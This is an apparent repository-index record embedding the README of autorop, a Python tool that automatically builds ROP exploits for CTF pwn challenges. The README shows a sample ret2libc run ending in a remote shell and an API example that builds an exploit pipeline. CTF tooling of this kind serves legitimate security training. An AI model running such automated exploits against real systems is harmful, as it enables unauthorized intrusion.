{"id":13341165,"url":"https://github.com/mariuszskon/autorop","last_synced_at":"2025-03-11T20:32:34.427Z","repository":{"id":52597042,"uuid":"299023441","full_name":"mariuszskon/autorop","owner":"mariuszskon","description":"Automated solver of classic CTF pwn challenges, with flexibility in mind.","archived":false,"fork":false,"pushed_at":"2022-04-03T09:35:36.000Z","size":238,"stargazers_count":55,"open_issues_count":5,"forks_count":8,"subscribers_count":2,"default_branch":"master","last_synced_at":"2024-10-24T08:29:11.357Z","etag":null,"topics":["capture-the-flag","ctf","exploit","hacktoberfest","linux","pwnable","pwntools","rop","wargame"],"latest_commit_sha":null,"homepage":"https://autorop.readthedocs.io","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mariuszskon.png","metadata":{"files":{"readme":"README.rst","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2020-09-27T12:06:38.000Z","updated_at":"2024-10-20T08:36:14.000Z","dependencies_parsed_at":"2022-09-01T04:12:39.441Z","dependency_job_id":null,"html_url":"https://github.com/mariuszskon/autorop","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mariuszskon%2Fautorop","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mariuszskon%2Fautorop/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mariuszskon%2Fautorop/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mariuszskon%2Fautorop/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mariuszskon","download_url":"https://codeload.github.com/mariuszskon/autorop/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":243108665,"owners_count":20237728,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["capture-the-flag","ctf","exploit","hacktoberfest","linux","pwnable","pwntools","rop","wargame"],"created_at":"2024-07-29T19:25:13.539Z","updated_at":"2025-03-11T20:32:34.118Z","avatar_url":"https://github.com/mariuszskon.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"autorop\n=======\n\n|docs| |Test status| |MIT license|\n\nAutomated solver of classic CTF pwn challenges, with flexibility in mind.\n\nOfficial documentation can be found at `autorop.readthedocs.io \u003chttps://autorop.readthedocs.io\u003e`_.\n\nDisclaimer\n----------\n\nDo not use this software for illegal purposes. This software is intended to be used in legal Capture the Flag competitions only.\n\nCommand line\n------------\n\n.. code-block:: text\n\n    $ autorop\n    Usage: autorop BINARY [HOST PORT]\n\n.. code-block:: text\n\n    $ autorop tests/bamboofox/ret2libc bamboofox.cs.nctu.edu.tw 11002\n    [*] '/home/mariusz/Projects/autorop/tests/bamboofox/ret2libc'\n        Arch:     i386-32-little\n        RELRO:    Partial RELRO\n        Stack:    No canary found\n        NX:       NX enabled\n        PIE:      No PIE (0x8048000)\n    [*] Produced pipeline: Classic(Corefile(), OpenTarget(), Puts(False, ['__libc_start_main', 'puts']), Auto(), SystemBinSh())\n    [*] Pipeline [1/5]: Corefile()\n    [+] Starting local process 'tests/bamboofox/ret2libc': pid 18833\n    [*] Process 'tests/bamboofox/ret2libc' stopped with exit code -11 (SIGSEGV) (pid 18833)\n    ...\n    [*] Switching to interactive mode\n    Hello!\n    The address of \"/bin/sh\" is 0x804a02c\n    The address of function \"puts\" is 0xf7e43da0\n    $ wc -c /home/ctf/flag\n    57 /home/ctf/flag\n\n\nAPI\n---\n\nImporting autorop automatically does a ``from pwn import *``, so you can use all of `pwntools' goodies \u003chttps://docs.pwntools.com/en/latest/\u003e`_.\n\nCentral to autorop's design is the `pipeline \u003chttps://en.wikipedia.org/wiki/Pipeline_(software)\u003e`_. Most functions take in a ``PwnState``, and pass it on to the next function with some attributes changed. ``Pipeline`` copies\\* the ``PwnState`` between each function so mutations are safe. This allows great simplicity and flexibility.\n\nSee how the below example neatly manages to \"downgrade\" the problem from something unique, to something generic that the ``Classic`` pipeline can handle.\n\n.. code-block:: python\n\n    from autorop import *\n\n    BIN = \"./tests/tjctf_2020/stop\"\n\n\n    def send_letter_first(tube, data):\n        # the binary expects us to choose a letter first, before it takes input unsafely\n        tube.sendline(\"A\")\n        # send actual payload\n        tube.sendline(data)\n\n    # create a starting state\n    s = PwnState(BIN, lambda: process(BIN))\n    # set an overwriter function, if the buffer overflow input\n    # is not available immediately\n    s.overwriter = send_letter_first\n\n    # use base classic pipeline, with printf for leaking\n    pipeline = turnkey.Classic(leak=leak.Printf())\n    result = pipeline(s)\n\n    # switch to interactive shell which we got via the exploit\n    result.target.interactive()\n\n\\* **Note**: Although most of the attributes are deep-copied, ``target`` and ``_elf`` are not.\n\n.. |docs| image:: https://readthedocs.org/projects/autorop/badge/\n    :target: https://autorop.readthedocs.io\n\n.. |Test status| image:: https://github.com/mariuszskon/autorop/workflows/autorop%20test/badge.svg?branch=master\n    :target: https://github.com/mariuszskon/autorop/actions?query=workflow%3A%22autorop+test%22+branch%3Amaster\n\n.. |MIT license| image:: https://img.shields.io/badge/license-MIT-blue.svg\n    :target: https://github.com/mariuszskon/autorop/blob/master/LICENSE\n\nInstall\n-------\n\n1. Install autorop itself. You might want to be in your `python virtual environment \u003chttps://docs.python.org/3/tutorial/venv.html\u003e`_. After cloning, install with pip:\n\n.. code-block:: text\n\n    $ git clone https://github.com/mariuszskon/autorop \u0026\u0026 cd autorop \u0026\u0026 pip install .\n\n2. Make sure corefiles are enabled and are plainly written to the right directory:\n\n.. code-block:: text\n\n    # sysctl -w kernel.core_pattern=core.%p\n\n3. (Optional) Install `libc-database \u003chttps://github.com/niklasb/libc-database\u003e`_ into ``~/.libc-database`` (or your own location then edit ``state.libc_database_path``).\n\n4. All done!\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmariuszskon%2Fautorop","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmariuszskon%2Fautorop","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmariuszskon%2Fautorop/lists"}